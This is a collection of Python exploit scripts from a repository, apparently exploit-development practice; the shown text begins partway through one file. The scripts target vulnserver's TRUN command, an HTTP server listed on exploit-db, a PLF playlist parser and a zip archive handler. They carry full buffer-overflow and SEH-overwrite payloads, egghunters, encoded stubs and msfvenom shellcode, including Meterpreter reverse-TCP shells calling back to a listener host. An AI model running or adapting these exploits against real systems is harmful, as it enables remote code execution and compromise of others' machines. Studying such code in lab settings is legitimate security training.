 74 | rev_met_7887 += "\x4a\x47\x7a\x72\x48\x6c\x6c\x72\x30\x6b\x70"
 75 | rev_met_7887 += "\x4f\x5a\x33\x58\x73\x32\x73\x30\x35\x4e\x48"
 76 | rev_met_7887 += "\x4f\x6b\x39\x6b\x56\x46\x30\x72\x70\x66\x30"
 77 | rev_met_7887 += "\x32\x70\x33\x70\x42\x70\x53\x70\x56\x30\x50"
 78 | rev_met_7887 += "\x68\x38\x6a\x76\x6f\x6b\x6f\x49\x70\x59\x6f"
 79 | rev_met_7887 += "\x6b\x65\x7a\x37\x73\x5a\x42\x30\x70\x56\x30"
 80 | rev_met_7887 += "\x57\x30\x68\x6e\x79\x6c\x65\x43\x44\x61\x71"
 81 | rev_met_7887 += "\x49\x6f\x58\x55\x4d\x55\x39\x50\x52\x54\x47"
 82 | rev_met_7887 += "\x7a\x6b\x4f\x30\x4e\x66\x68\x50\x75\x78\x6c"
 83 | rev_met_7887 += "\x6d\x38\x75\x37\x45\x50\x53\x30\x33\x30\x71"
 84 | rev_met_7887 += "\x7a\x45\x50\x30\x6a\x44\x44\x32\x76\x66\x37"
 85 | rev_met_7887 += "\x31\x78\x33\x32\x59\x49\x58\x48\x71\x4f\x6b"
 86 | rev_met_7887 += "\x4f\x7a\x75\x6f\x73\x38\x78\x63\x30\x43\x4e"
 87 | rev_met_7887 += "\x66\x56\x4c\x4b\x45\x66\x43\x5a\x37\x30\x52"
 88 | rev_met_7887 += "\x48\x35\x50\x56\x70\x73\x30\x45\x50\x61\x46"
 89 | rev_met_7887 += "\x42\x4a\x57\x70\x52\x48\x72\x78\x4e\x44\x43"
 90 | rev_met_7887 += "\x63\x4d\x35\x79\x6f\x4e\x35\x6e\x73\x53\x63"
 91 | rev_met_7887 += "\x70\x6a\x75\x50\x42\x76\x70\x53\x70\x57\x51"
 92 | rev_met_7887 += "\x78\x74\x42\x6a\x79\x4a\x68\x53\x6f\x4b\x4f"
 93 | rev_met_7887 += "\x4e\x35\x4f\x73\x6a\x58\x63\x30\x51\x6d\x64"
 94 | rev_met_7887 += "\x68\x56\x38\x63\x58\x57\x70\x63\x70\x37\x70"
 95 | rev_met_7887 += "\x55\x50\x63\x5a\x37\x70\x42\x70\x65\x38\x66"
 96 | rev_met_7887 += "\x6b\x36\x4f\x34\x4f\x46\x50\x79\x6f\x68\x55"
 97 | rev_met_7887 += "\x72\x77\x51\x78\x51\x65\x52\x4e\x52\x6d\x51"
 98 | rev_met_7887 += "\x71\x69\x6f\x48\x55\x33\x6e\x63\x6e\x6b\x4f"
 99 | rev_met_7887 += "\x74\x4c\x46\x44\x66\x6f\x4f\x75\x44\x30\x69"
100 | rev_met_7887 += "\x6f\x59\x6f\x59\x6f\x48\x69\x4f\x6b\x59\x6f"
101 | rev_met_7887 += "\x59\x6f\x4b\x4f\x37\x71\x59\x53\x71\x39\x5a"
102 | rev_met_7887 += "\x66\x43\x45\x6f\x31\x6a\x63\x6d\x6b\x58\x70"
103 | rev_met_7887 += "\x48\x35\x6f\x52\x63\x66\x70\x6a\x45\x50\x66"
104 | rev_met_7887 += "\x33\x69\x6f\x48\x55\x41\x41"
105 | 
106 | encoded_egg = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI56OqZj9oVoQRRraz7rf8jm4nGLeURzBTXoH82WP0TpRTnkyjnORUjJlocEm7yokWAA"
107 | 
108 | l33t_shit = ""
109 | l33t_shit += "\x25\x4A\x4D\x4E\x55"   #  AND EAX,554E4D4A
110 | l33t_shit += "\x25\x35\x32\x31\x2A"   #  AND EAX,2A313235
111 | l33t_shit += "\x2D\x5A\x56\x4E\x55"   #  SUB EAX,554E565A
112 | l33t_shit += "\x2D\x5A\x56\x4E\x55"   #  SUB EAX,554E565A
113 | l33t_shit += "\x2D\x5C\x58\x50\x55"   #  SUB EAX,5550585C
114 | l33t_shit += "\x50"                   #  PUSH EAX
115 | l33t_shit += "\x5A"                   #  POP EDX
116 | l33t_shit += "\x54"                   #  PUSH ESP
117 | l33t_shit += "\x58"                   #  POP EAX
118 | 
119 | l33t_shit += "\x2D\x43\x53\x55\x55"   #  SUB EAX,55555343
120 | l33t_shit += "\x2D\x43\x53\x55\x55"   #  SUB EAX,55555343
121 | l33t_shit += "\x2D\x42\x53\x55\x55"   #  SUB EAX,55555342
122 | l33t_shit += "\x50"                   #  PUSH EAX
123 | l33t_shit += "\x5C"                   #  POP ESP
124 | 
125 | l33t_shit += "\x25\x4A\x4D\x4E\x55"   #    AND EAX,554E4D4A
126 | l33t_shit += "\x25\x35\x32\x31\x2A"   #    AND EAX,2A313235
127 | l33t_shit += "\x2D\x55\x5E\x24\x25"   #    SUB EAX,25245E55
128 | l33t_shit += "\x2D\x55\x5E\x24\x25"   #    SUB EAX,25245E55
129 | l33t_shit += "\x2D\x57\x60\x26\x25"   #    SUB EAX,25266057
130 | l33t_shit += "\x50"                   #    PUSH EAX
131 | 
132 | payload = "A" * 26
133 | payload += encoded_egg
134 | payload += "A" * 28
135 | payload += "BBBB"
136 | payload += l33t_shit
137 | payload += "C" * (119 - len(l33t_shit))
138 | payload += "\x71\x9F\x70\x9F"
139 | payload += pack("<L",0x00407a33)
140 | payload += rev_met_7887
141 | payload += "D" * (max_size - len(payload))
142 | payload += ".txt"
143 | 
144 | print("[*] Size : {0} bytes".format(len(payload)))
145 | print("[*] Removing old {filename} file".format(filename=filename))
146 | try:
147 |     remove(filename)
148 | except OSError:
149 |     print("[!] Couldn't remove, probably doesn't exist. Ignoring this error")
150 |     pass
151 | print("[*] Creating new {filename} file".format(filename=filename))
152 | with open(filename, "w") as f:
153 |     file_content = ldf_header + payload + cdf_header + payload + eofcdf_header
154 |     f.write(file_content)
155 | 
156 | 


--------------------------------------------------------------------------------
/seh_exploitdb.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import os
 3 | from struct import pack
 4 | #https://www.exploit-db.com/exploits/42186/
 5 | 
 6 | crash1 =  "A" * 4061
 7 | #nextseh - short jmp 6bytes
 8 | crash1 += "\x90\x90\xeb\x06" 
 9 | #handler !mona seh -> pop pop rtn 0x10010334 
10 | crash1 += pack("<L",0x10010334)
11 | crash1 += "\x90" * 50
12 | crash1 += ("\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" +
13 | "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
14 | "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
15 | "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
16 | "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
17 | "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" +
18 | "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" +
19 | "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" +
20 | "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" +
21 | "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" +
22 | "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" +
23 | "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" +
24 | "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" +
25 | "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" +
26 | "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" +
27 | "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" +
28 | "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" +
29 | "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" +
30 | "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" +
31 | "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" +
32 | "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" +
33 | "\x31\x42\x4c\x42\x43\x45\x50\x41\x41")
34 | 
35 | print "[+] Length of crash1 " + str(len(crash1))
36 | crash1 += "C" * (5000 - len(crash1))
37 | 
38 | payload =  "GET " + crash1 + " HTTP/1.1\r\n"
39 | payload += "Host: 172.16.192.163\r\n"
40 | payload += "User-Agent: Mozilla/5.0(X11; Linux x86_64;rv:43.0) Gecko 2001001001 Firfox/43.0 Iceweasle/43.0\r\n"
41 | 
42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43 | s.connect(("172.16.192.163", 80))
44 | print "[+] Sending Payload ..."
45 | 
46 | s.send(payload)
47 | s.close()
48 | 


--------------------------------------------------------------------------------
/seh_fuzzysecurity.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | file_name = 'evil.plf'
 3 | 
 4 | #msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b ‘\x00\x0a\x0d\xff’ -f python
 5 | buf  = ""
 6 | buf += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
 7 | buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
 8 | buf += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
 9 | buf += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
10 | buf += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
11 | buf += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
12 | buf += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
13 | buf += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
14 | buf += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
15 | buf += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
16 | buf += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
17 | buf += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
18 | buf += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
19 | buf += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
20 | buf += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
21 | buf += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
22 | buf += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
23 | 
24 | 
25 | #overwrite SEH 612, nSEH 608
26 | #P-P-R 6164172e
27 | payload = "\x41" * 608 + "\xeb\x06\x90\x90" + "\x2e\x17\x64\x61" + buf + "\x90" * (2000 - 608 - 4 - 4 - len(buf))
28 | 
29 | crash_file = open(file_name,'w')
30 | crash_file.write(payload)
31 | 
32 | crash_file.close()


--------------------------------------------------------------------------------
/trun_recreate_socket.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import socket
 3 | from struct import pack
 4 | from time import sleep
 5 | 
 6 | host = '172.16.192.168'
 7 | port = 9999
 8 | max_size = 5000
 9 | 
10 | ############### SOCKET CALL ###################################
11 | exploit  = "\xCC"
12 | exploit += "\x83\xEC\x7C" 			# SUB ESP,7C
13 | exploit += "\xB2\x06"     			# MOV DL,6
14 | exploit += "\x52"		  			# PUSH EDX
15 | exploit += "\xB2\x01" 	  			# MOV DL,1
16 | exploit += "\x52"		  			# PUSH EDX
17 | exploit += "\x42"		  			# INC EDX
18 | exploit += "\x52"		  			# PUSH EDX
19 | exploit += "\xBB\x66\x7C\x25\x40" 	# MOV EBX,40257C66
20 | exploit += "\xC1\xEB\x08"       	# SHR EBX,8
21 | exploit += "\xFF\xD3"				# CALL EBX
22 | #################################################################
23 | 
24 | ############### BIND CALL ###################################
25 | 
26 | 
27 | 
28 | 
29 | 
30 | 
31 | 
32 | 
33 | 
34 | 
35 | 
36 | 
37 | payload  = "A" * 2003
38 | payload += pack("<L", 0x625011af)
39 | payload += exploit
40 | payload += "\xCC" * (max_size - len(payload))
41 | 
42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43 | s.connect((host, port))
44 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
45 | s.send("TRUN /.:/" + payload + "\r\n")
46 | s.close()
47 | 
48 | 
49 | # 0040257C   $-FF25 FC614000  JMP DWORD PTR DS:[<&WS2_32.socket>]      ;  WS2_32.socket(2,1,6)
50 | # 00402564   $-FF25 D8614000  JMP DWORD PTR DS:[<&WS2_32.bind>]        ;  WS2_32.bind
51 | # 00402554   $-FF25 F0614000  JMP DWORD PTR DS:[<&WS2_32.listen>]      ;  WS2_32.listen
52 | # 0040254C   $-FF25 D4614000  JMP DWORD PTR DS:[<&WS2_32.accept>]      ;  WS2_32.accept
53 | # 0040252C   $-FF25 F4614000  JMP DWORD PTR DS:[<&WS2_32.recv>]        ;  WS2_32.recv
54 | 
55 | # 00402DC0   $-FF25 98614000  JMP DWORD PTR DS:[<&msvcrt.malloc>]      ;  msvcrt.malloc
56 | # 00402E48   $-FF25 54614000  JMP DWORD PTR DS:[<&KERNEL32.VirtualProt>;  kernel32.VirtualProtect
57 | 
58 | # EAX 00B7F22C 
59 | # ECX 003E6A6C
60 | # EDX 00000000
61 | # EBX 00000080
62 | # ESP 00B7FA0C
63 | # EBP 41414141
64 | # ESI 0024A6F8
65 | # EDI 0024DE38
66 | # EIP 00B7FA0D
67 | 
68 | 
69 | 
70 | 
71 | 


--------------------------------------------------------------------------------
/trun_recv_reuse.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import socket
 3 | from struct import pack
 4 | from time import sleep
 5 | 
 6 | host = '172.16.192.168'
 7 | port = 9999
 8 | max_size = 5000
 9 | 
10 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.192.224 LPORT=7887 
11 | # -b "\x00\x21" -a x86 --platform windows -f py -v shellcode
12 | shellcode =  ""
13 | shellcode += "\xba\xbe\x7a\x55\x7d\xd9\xcf\xd9\x74\x24\xf4\x5b"
14 | shellcode += "\x2b\xc9\xb1\x56\x31\x53\x13\x03\x53\x13\x83\xeb"
15 | shellcode += "\x42\x98\xa0\x81\x52\xdf\x4b\x7a\xa2\x80\xc2\x9f"
16 | shellcode += "\x93\x80\xb1\xd4\x83\x30\xb1\xb9\x2f\xba\x97\x29"
17 | shellcode += "\xa4\xce\x3f\x5d\x0d\x64\x66\x50\x8e\xd5\x5a\xf3"
18 | shellcode += "\x0c\x24\x8f\xd3\x2d\xe7\xc2\x12\x6a\x1a\x2e\x46"
19 | shellcode += "\x23\x50\x9d\x77\x40\x2c\x1e\xf3\x1a\xa0\x26\xe0"
20 | shellcode += "\xea\xc3\x07\xb7\x61\x9a\x87\x39\xa6\x96\x81\x21"
21 | shellcode += "\xab\x93\x58\xd9\x1f\x6f\x5b\x0b\x6e\x90\xf0\x72"
22 | shellcode += "\x5f\x63\x08\xb2\x67\x9c\x7f\xca\x94\x21\x78\x09"
23 | shellcode += "\xe7\xfd\x0d\x8a\x4f\x75\xb5\x76\x6e\x5a\x20\xfc"
24 | shellcode += "\x7c\x17\x26\x5a\x60\xa6\xeb\xd0\x9c\x23\x0a\x37"
25 | shellcode += "\x15\x77\x29\x93\x7e\x23\x50\x82\xda\x82\x6d\xd4"
26 | shellcode += "\x85\x7b\xc8\x9e\x2b\x6f\x61\xfd\x23\x5c\x48\xfe"
27 | shellcode += "\xb3\xca\xdb\x8d\x81\x55\x70\x1a\xa9\x1e\x5e\xdd"
28 | shellcode += "\xb8\x09\x61\x31\x02\x59\x9f\xb2\x72\x73\x64\xe6"
29 | shellcode += "\x22\xeb\x4d\x87\xa9\xeb\x72\x52\x47\xe6\xe4\xf1"
30 | shellcode += "\x87\x36\x11\x61\xa5\xb6\xc4\xbd\x20\x50\xa8\x11"
31 | shellcode += "\x62\xcd\x09\xc2\xc2\xbd\xe1\x08\xcd\xe2\x12\x33"
32 | shellcode += "\x04\x8b\xb9\xdc\xf0\xe3\x55\x44\x59\x7f\xc7\x89"
33 | shellcode += "\x74\x05\xc7\x02\x7c\xf9\x86\xe2\xf5\xe9\xff\x94"
34 | shellcode += "\xf5\xf1\xff\x30\xf5\x9b\xfb\x92\xa2\x33\x06\xc2"
35 | shellcode += "\x84\x9b\xf9\x21\x97\xdc\x06\xb4\xa1\x97\x31\x22"
36 | shellcode += "\x8d\xcf\x3d\xa2\x0d\x10\x68\xa8\x0d\x78\xcc\x88"
37 | shellcode += "\x5e\x9d\x13\x05\xf3\x0e\x86\xa6\xa5\xe3\x01\xcf"
38 | shellcode += "\x4b\xdd\x66\x50\xb4\x08\xf5\x97\x4a\xce\xd2\x3f"
39 | shellcode += "\x22\x30\x63\xc0\xb2\x5a\x63\x90\xda\x91\x4c\x1f"
40 | shellcode += "\x2a\x59\x47\x48\x22\xd0\x06\x3a\xd3\xe5\x02\x9a"
41 | shellcode += "\x4d\xe5\xa1\x07\x7e\x9c\xca\xb8\x7f\x61\xc3\xdc"
42 | shellcode += "\x80\x61\xeb\xe2\xbd\xb7\xd2\x90\x80\x0b\x61\xaa"
43 | shellcode += "\xb7\x2e\xc0\x21\xb7\x7d\x12\x60"
44 | 
45 | exploit = "\x83\xEC\x30" 				# SUB ESP, 30
46 | exploit += "\x52" 						# PUSH ESP
47 | exploit += "\xB6\x02" 					# MOV DH, 2
48 | 
49 | exploit += "\x52"  						# PUSH EDX
50 | exploit += "\x54"  						# PUSH ESP
51 | exploit += "\x5A"  						# POP EDX
52 | exploit += "\x83\xC2\x60"  				# ADD EDX,60
53 | exploit += "\x52"  						# PUSH EDX
54 | 
55 | exploit += "\xBA\x44\x94\xFB\xB7" 		# MOV EDX,B7FB9844
56 | exploit += "\xC1\xEA\x08" 				# SHR EDX,8
57 | exploit += "\xFF\x32" 					# PUSH EDX
58 | 
59 | exploit += "\xBA\x33\x2C\x25\x40"		# SOCKET ADDR
60 | exploit += "\xC1\xEA\x08" 				# SHR EDX, 8
61 | exploit += "\xFF\xD2"  # PUSH EDX
62 | 
63 | payload  = "A" * 2003
64 | payload += pack("<L", 0x625011af)
65 | payload += exploit
66 | payload += "A" * (42 - len(exploit))
67 | 
68 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
69 | s.connect((host, port))
70 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
71 | s.send("TRUN /.:/" + payload + "\r\n")
72 | sleep(1)
73 | s.send(shellcode + "A" * (512 -len(shellcode)))
74 | s.close()
75 | 


--------------------------------------------------------------------------------
/trun_vulnserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import socket
 3 | from struct import pack
 4 | 
 5 | host = '172.16.192.168'
 6 | port = 9999
 7 | max_size = 5000
 8 | 
 9 | # msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.192.216 LPORT=7887 
10 | # -b "\x00\x21" -a x86 --platform windows -f py -v shellcode
11 | 
12 | shellcode =  ""
13 | shellcode += "\xb8\x63\x4f\x16\x39\xdb\xc7\xd9\x74\x24\xf4"
14 | shellcode += "\x5b\x29\xc9\xb1\x56\x83\xeb\xfc\x31\x43\x0f"
15 | shellcode += "\x03\x43\x6c\xad\xe3\xc5\x9a\xb3\x0c\x36\x5a"
16 | shellcode += "\xd4\x85\xd3\x6b\xd4\xf2\x90\xdb\xe4\x71\xf4"
17 | shellcode += "\xd7\x8f\xd4\xed\x6c\xfd\xf0\x02\xc5\x48\x27"
18 | shellcode += "\x2c\xd6\xe1\x1b\x2f\x54\xf8\x4f\x8f\x65\x33"
19 | shellcode += "\x82\xce\xa2\x2e\x6f\x82\x7b\x24\xc2\x33\x08"
20 | shellcode += "\x70\xdf\xb8\x42\x94\x67\x5c\x12\x97\x46\xf3"
21 | shellcode += "\x29\xce\x48\xf5\xfe\x7a\xc1\xed\xe3\x47\x9b"
22 | shellcode += "\x86\xd7\x3c\x1a\x4f\x26\xbc\xb1\xae\x87\x4f"
23 | shellcode += "\xcb\xf7\x2f\xb0\xbe\x01\x4c\x4d\xb9\xd5\x2f"
24 | shellcode += "\x89\x4c\xce\x97\x5a\xf6\x2a\x26\x8e\x61\xb8"
25 | shellcode += "\x24\x7b\xe5\xe6\x28\x7a\x2a\x9d\x54\xf7\xcd"
26 | shellcode += "\x72\xdd\x43\xea\x56\x86\x10\x93\xcf\x62\xf6"
27 | shellcode += "\xac\x10\xcd\xa7\x08\x5a\xe3\xbc\x20\x01\x6b"
28 | shellcode += "\x70\x09\xba\x6b\x1e\x1a\xc9\x59\x81\xb0\x45"
29 | shellcode += "\xd1\x4a\x1f\x91\x60\x5c\xa0\x4d\xca\x0d\x5e"
30 | shellcode += "\x6e\x2a\x07\xa5\x3a\x7a\x3f\x0c\x43\x11\xbf"
31 | shellcode += "\xb1\x96\x8f\xb5\x25\xb5\x5f\x0a\x6d\xad\x5d"
32 | shellcode += "\x8a\x90\xe1\xe8\x6c\xfc\xad\xba\x20\xbd\x1d"
33 | shellcode += "\x7a\x91\x55\x74\x75\xce\x46\x77\x5c\x67\xec"
34 | shellcode += "\x98\x08\xdf\x99\x01\x11\xab\x38\xcd\x8c\xd1"
35 | shellcode += "\x7b\x45\x24\x25\x35\xae\x4d\x35\x22\xc9\xad"
36 | shellcode += "\xc5\xb3\x7c\xad\xaf\xb7\xd6\xfa\x47\xba\x0f"
37 | shellcode += "\xcc\xc7\x45\x7a\x4f\x0f\xb9\xfb\x79\x7b\x8c"
38 | shellcode += "\x69\xc5\x13\xf1\x7d\xc5\xe3\xa7\x17\xc5\x8b"
39 | shellcode += "\x1f\x4c\x96\xae\x5f\x59\x8b\x62\xca\x62\xfd"
40 | shellcode += "\xd7\x5d\x0b\x03\x01\xa9\x94\xfc\x64\xa9\xd3"
41 | shellcode += "\x02\xfa\x86\x7b\x6a\x04\x97\x7b\x6a\x6e\x17"
42 | shellcode += "\x2c\x02\x65\x38\xc3\xe2\x86\x93\x8c\x6a\x0c"
43 | shellcode += "\x72\x7e\x0b\x11\x5f\xde\x95\x12\x6c\xfb\x26"
44 | shellcode += "\x68\x1d\xfc\xc7\x8d\x37\x99\xc8\x8d\x37\x9f"
45 | shellcode += "\xf5\x5b\x0e\xd5\x38\x58\x35\xe6\x0f\xfd\x1c"
46 | shellcode += "\x6d\x6f\x51\x5e\xa4"
47 | 
48 | payload  = "A" * 2003
49 | payload += pack("<L", 0x625011af)
50 | payload += "\x90" * 50
51 | payload += shellcode
52 | payload += "C" * (max_size - len(payload))
53 | 
54 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
55 | s.connect((host, port))
56 | print s.recv(1024)
57 | print "[*] Sending payload of size: {0} chars...".format(len(payload))
58 | 
59 | s.send("TRUN /.:/" + payload + "\r\n")
60 | 
61 | s.close()
62 | 


--------------------------------------------------------------------------------
/zipper_poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | from os import remove
  4 | from struct import pack
  5 | 
  6 | filename = "zipper_bomb.zip"
  7 | payload_ext = ".txt"
  8 | nseh_offset = 1022
  9 | as_offset = 899
 10 | bs_offset = 123
 11 | max_size = 4068
 12 | ldf_header = (
 13 |     "\x50\x4B\x03\x04\x14\x00\x00"
 14 |     "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
 15 |     "\x00\x00\x00\x00\x00\x00\x00\x00"
 16 |     "\xe4\x0f"  # file size
 17 |     "\x00\x00\x00"
 18 | )
 19 | 
 20 | cdf_header = (
 21 |     "\x50\x4B\x01\x02\x14\x00\x14"
 22 |     "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
 23 |     "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 24 |     "\xe4\x0f"  # file size
 25 |     "\x00\x00\x00\x00\x00\x00\x01\x00"
 26 |     "\x24\x00\x00\x00\x00\x00\x00\x00"
 27 | )
 28 | 
 29 | eofcdf_header = (
 30 |     "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
 31 |     "\x12\x10\x00\x00"  # Size of central directory (bytes)
 32 |     "\x02\x10\x00\x00"  # Offset of start of central directory,
 33 |     # relative to start of archive
 34 |     "\x00\x00"
 35 | )
 36 | 
 37 | encoded_egghunter = "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI3VmQZjyovosr0R1zdBaHhM4nWLGuCjBTzOH8pw4pdpt4Nk8zLo1eKZLoRU8gyojGAA"
 38 | encoded_edi = "\x2D\x30\x58\x4E\x55"     #SUB EAX, 554E5830
 39 | encoded_edi += "\x2D\x30\x58\x4E\x55"     #SUB EAX, 554E5830
 40 | encoded_edi += "\x2D\x30\x5A\x50\x55"     #SUB EAX, 55505A30    
 41 | encoded_edi += "\x50"     #PUSH EAX
 42 | encoded_edi += "\x5E"     #POP ESI
 43 | encoded_edi += "\x50"     #PUSH EAX
 44 | encoded_edi += "\x5F"     #POP ESI
 45 | encoded_edi += "\x98\x91"
 46 | 
 47 | rev_met_7887 =  "w00tw00t"
 48 | rev_met_7887 += "\xd9\xea\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a"
 49 | rev_met_7887 += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
 50 | rev_met_7887 += "\x43\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41"
 51 | rev_met_7887 += "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
 52 | rev_met_7887 += "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
 53 | rev_met_7887 += "\x75\x4a\x49\x49\x6c\x58\x68\x6d\x52\x37\x70"
 54 | rev_met_7887 += "\x67\x70\x45\x50\x61\x70\x6e\x69\x6a\x45\x36"
 55 | rev_met_7887 += "\x51\x4b\x70\x62\x44\x6c\x4b\x72\x70\x70\x30"
 56 | rev_met_7887 += "\x4e\x6b\x71\x42\x46\x6c\x6e\x6b\x63\x62\x74"
 57 | rev_met_7887 += "\x54\x4c\x4b\x33\x42\x75\x78\x44\x4f\x48\x37"
 58 | rev_met_7887 += "\x30\x4a\x64\x66\x56\x51\x59\x6f\x4e\x4c\x57"
 59 | rev_met_7887 += "\x4c\x63\x51\x61\x6c\x34\x42\x74\x6c\x77\x50"
 60 | rev_met_7887 += "\x49\x51\x7a\x6f\x54\x4d\x66\x61\x4a\x67\x6b"
 61 | rev_met_7887 += "\x52\x38\x72\x36\x32\x56\x37\x6e\x6b\x73\x62"
 62 | rev_met_7887 += "\x32\x30\x6c\x4b\x30\x4a\x77\x4c\x4e\x6b\x62"
 63 | rev_met_7887 += "\x6c\x67\x61\x30\x78\x48\x63\x43\x78\x47\x71"
 64 | rev_met_7887 += "\x4b\x61\x30\x51\x4e\x6b\x36\x39\x55\x70\x57"
 65 | rev_met_7887 += "\x71\x69\x43\x4e\x6b\x51\x59\x76\x78\x4b\x53"
 66 | rev_met_7887 += "\x55\x6a\x62\x69\x4c\x4b\x64\x74\x4e\x6b\x75"
 67 | rev_met_7887 += "\x51\x59\x46\x66\x51\x39\x6f\x4c\x6c\x6b\x71"
 68 | rev_met_7887 += "\x4a\x6f\x46\x6d\x45\x51\x39\x57\x65\x68\x69"
 69 | rev_met_7887 += "\x70\x53\x45\x49\x66\x53\x33\x33\x4d\x79\x68"
 70 | rev_met_7887 += "\x65\x6b\x33\x4d\x34\x64\x72\x55\x58\x64\x66"
 71 | rev_met_7887 += "\x38\x4c\x4b\x50\x58\x71\x34\x46\x61\x6b\x63"
 72 | rev_met_7887 += "\x31\x76\x4e\x6b\x36\x6c\x62\x6b\x6e\x6b\x73"
 73 | rev_met_7887 += "\x68\x37\x6c\x67\x71\x68\x53\x4c\x4b\x35\x54"
 74 | rev_met_7887 += "\x6c\x4b\x53\x31\x4a\x70\x6c\x49\x67\x34\x31"
 75 | rev_met_7887 += "\x34\x55\x74\x51\x4b\x33\x6b\x50\x61\x53\x69"
 76 | rev_met_7887 += "\x51\x4a\x56\x31\x6b\x4f\x4d\x30\x33\x6f\x31"
 77 | rev_met_7887 += "\x4f\x53\x6a\x6e\x6b\x56\x72\x6a\x4b\x4c\x4d"
 78 | rev_met_7887 += "\x71\x4d\x35\x38\x75\x63\x75\x62\x47\x70\x75"
 79 | rev_met_7887 += "\x50\x30\x68\x74\x37\x53\x43\x66\x52\x31\x4f"
 80 | rev_met_7887 += "\x53\x64\x71\x78\x42\x6c\x63\x47\x76\x46\x67"
 81 | rev_met_7887 += "\x77\x6b\x39\x39\x78\x39\x6f\x78\x50\x48\x38"
 82 | rev_met_7887 += "\x4e\x70\x43\x31\x37\x70\x43\x30\x55\x79\x48"
 83 | rev_met_7887 += "\x44\x53\x64\x30\x50\x31\x78\x55\x79\x6b\x30"
 84 | rev_met_7887 += "\x42\x4b\x57\x70\x79\x6f\x48\x55\x50\x6a\x64"
